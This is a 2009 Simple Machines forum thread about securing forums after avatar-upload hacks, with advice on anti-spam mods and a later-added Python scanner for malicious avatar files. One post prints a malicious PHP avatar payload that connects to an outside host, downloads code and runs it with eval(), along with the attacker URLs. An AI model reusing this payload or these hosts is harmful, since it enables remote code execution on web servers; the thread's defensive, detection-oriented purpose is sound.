[NOTICE] How to secure your site against recent attacks

Started by jblazeofek, May 11, 2009, 08:05:23 AM


Jakkals

Hi everybody.

I am about to install the first-mentioned mods, but I would like to share something with you.

I run a forum and have set it up for all registrations to be approved by admins. I do get up to 5 or more weirdo 'registrations' per day and then simply reject them. I have also banned quite a number of them. Seems like it works.

If I install the mod(s), will it prevent even the attempts to register? So my 'Awaiting Approval' list will be (almost) empty in the morning?

Regards, and thanks for everybody's time to contribute to this topic.
A liar is caught sooner than a lame dog.

JBlaze

The approval by admin method does work as long as you know what to look for. The Stop Spammer mod will highlight suspicious and/or reported IPs, emails and usernames AFTER they register, but it will put that account into approval state.

The reCAPTCHA mod will prevent spam registration, period.
Jason Clemons
Former Team Member 2009 - 2012

L'AltroWeb

I've some potential good info
Avatar code:
<?php;$url 'http://wplsat23.net/?update=main';$done false;if(!$url){return '';}$url_info parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" $url_info[query] : ""; $query "GET " $url_info[path] . " HTTP/1.1\r\n"; $query $query "Host: " $url_info[host] . "\r\n"; $query $query "Accept: */*" "\r\n"; $query $query "Connection: close" "\r\n"; $query $query "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "\r\n"; $query $query "\r\n"; $errno 0; $error ""; $sock fsockopen($url_info[host], $url_info[port], $errno$error30);$h = array();$resp = array();if($sock){stream_set_timeout($sock30);fwrite($sock$query);$hd false;while(!feof($sock)){$l fgets($sock);if(!$hd){if(trim($l) == ''){$hd true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret implode(""$resp);eval($ret);?>
Important link: http://wplsat23.net/?update=main
And here: http://nomsat23.net/?update=js&host= (block page and see source code)
I think if you don't have fsockopen enabled this bug can't work :)
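
A defender-side check for the pattern in the post above, added here as an example and not part of the original thread or of SMF: a Python scan of an avatar upload directory for files that contain the PHP markers seen in the quoted payload (`<?php`, `eval(`, `fsockopen(`) or that do not start with an image magic number. The function names and the directory passed to `scan_dir` are assumptions, and the sample files are constructed.

```python
import re
import tempfile
from pathlib import Path

# Byte patterns that appear in the avatar payload quoted in the post above.
MARKERS = {
    "php_open_tag": re.compile(rb"<\?php", re.I),
    "eval_call": re.compile(rb"\beval\s*\(", re.I),
    "fsockopen_call": re.compile(rb"\bfsockopen\s*\(", re.I),
}
# Magic numbers of the image types usually accepted as avatars.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")


def scan_bytes(data):
    """Return the reasons a single uploaded file looks suspicious."""
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(data))
    if not data.startswith(IMAGE_MAGIC):
        hits.append("not_an_image")
    return hits


def scan_dir(root):
    """Map each suspicious file under root to its list of reasons."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            hits = scan_bytes(path.read_bytes())
            if hits:
                findings[str(path)] = hits
    return findings


def demo():
    """Scan three constructed files: a clean GIF, a GIF with PHP, a bare script."""
    samples = {
        "avatar_1.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00;",
        "avatar_2.gif": b"GIF89a\x01\x00<?php eval($ret); ?>",
        "avatar_3.png": b"<?php $sock = fsockopen($host, 80); ?>",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            (Path(tmp) / name).write_bytes(body)
        return {Path(p).name: h for p, h in scan_dir(tmp).items()}


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, reasons)
```

The `not_an_image` reason only makes sense for a directory that should hold images; an attachments directory that legitimately stores other file types needs only the marker checks.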

Dzonny


JBlaze

I'm hoping. The developers are working on it as a priority so keep your eyes peeled.

Once it is finished, I'm sure they will let everyone know.
Jason Clemons
Former Team Member 2009 - 2012

N3RVE

* [n3rve] marks topic solved to take it off supporttopics.php

-[n3rve]
Ralph "[n3rve]" Otowo
Former Marketing Co-ordinator, Simple Machines.
ralph [at] simplemachines [dot] org
"Somewhere, something incredible is waiting to be known." - Carl Sagan

JBlaze

Quote from: [n3rve] on May 14, 2009, 10:18:30 AM
* [n3rve] marks topic solved to take it off supporttopics.php

-[n3rve]

Heh... I forgot about that. And btw, it's still marked unsolved :P
Jason Clemons
Former Team Member 2009 - 2012

Dzonny

No, it's marked as solved now... :)
And I believe this is going to be really solved soon..

JBlaze

Quote from: Dzonny on May 14, 2009, 01:48:55 PM
No, it's marked as solved now... :)
And I believe this is going to be really solved soon..

I marked it as solved :P
Jason Clemons
Former Team Member 2009 - 2012

dl75

I really hope I read this thread sooner. I got hacked today, and what stinks is that I know so little about any of this stuff. I contacted my server people and they said it's definitely hacked. I followed all of these steps you have posted, and I hope it works for the future.

Thank you so much for taking the time to post all this. You guys are really great!

JBlaze

Quote from: dl75 on May 14, 2009, 02:58:47 PM
I really hope I read this thread sooner. I got hacked today, and what stinks is that I know so little about any of this stuff. I contacted my server people and they said it's definitely hacked. I followed all of these steps you have posted, and I hope it works for the future.

Thank you so much for taking the time to post all this. You guys are really great!

Have you already cleaned it up? What has your host said?

Jason Clemons
Former Team Member 2009 - 2012

dl75

Well like I said, being I know nothing, I only listened. He said that someone hacked in, and he had to restore my forum back to like 4 days ago (no need to say that I lost everything that was done on the forum for the past 4 days).

The only thing I did is just now disabled avatar and attachments upload. I don't remember the whole message, but it said the error was in index.php on line 54.

Forum seems OK now, I'm just terrified of this happening again.

greystonesguide

Quote: Move the included file "files/recaptchalib.php" to "./Sources".

Thanks for this.
A bit stuck as to how to do this??


JBlaze

Quote from: greystonesguide on May 14, 2009, 06:14:12 PM
Quote: Move the included file "files/recaptchalib.php" to "./Sources".

Thanks for this.
A bit stuck as to how to do this??



Best to ask this question in the mods support topic. :)
Jason Clemons
Former Team Member 2009 - 2012

greystonesguide

Hi
Was a bit stumped then just realised how to do it after spending ages thinking about it
The joys of it!!!
Thanks a lot - great stuff

JBlaze

Quote from: greystonesguide on May 14, 2009, 06:22:13 PM
Hi
Was a bit stumped then just realised how to do it after spending ages thinking about it
The joys of it!!!
Thanks a lot - great stuff

No problem. Even though I didn't help at all :P
Jason Clemons
Former Team Member 2009 - 2012

yankeestonk

I uploaded the stopspammer and it said it was uploaded successfully. I see it in the packages, but I don't see it anywhere else. How do you use this if you can't see it? Did I miss a final step? I saved the zip file to desktop. Uploaded it into my forum. It said uploaded OK, it's in my packages, how do I access it? Should I see it listed somewhere on the menu?

JBlaze

Quote from: yankeestonk on May 14, 2009, 06:59:19 PM
I uploaded the stopspammer and it said it was uploaded successfully. I see it in the packages, but I don't see it anywhere else. How do you use this if you can't see it? Did I miss a final step? I saved the zip file to desktop. Uploaded it into my forum. It said uploaded OK, it's in my packages, how do I access it? Should I see it listed somewhere on the menu?

The Stop Spammer mod is only active when a blacklisted IP, username, or email is detected trying to sign in to your site. Then, that account goes into approval state.

Look in your approvals section of Admin -> Members

Jason Clemons
Former Team Member 2009 - 2012

JBlaze

Jason Clemons
Former Team Member 2009 - 2012

dl75

JBlaze, I apologize if I'm posting this in the wrong section. As you know of my hacking incident, now I'm all paranoid. I just uploaded "stopspammer", tested it, it looks alright so far. Now, I had visual verification installed a while back. Just now when I tested stopspammer, the registration seems to be loading SUPER slow. Could that be an aftermath of the hacking? Is there anything I can do about this?

Thank you
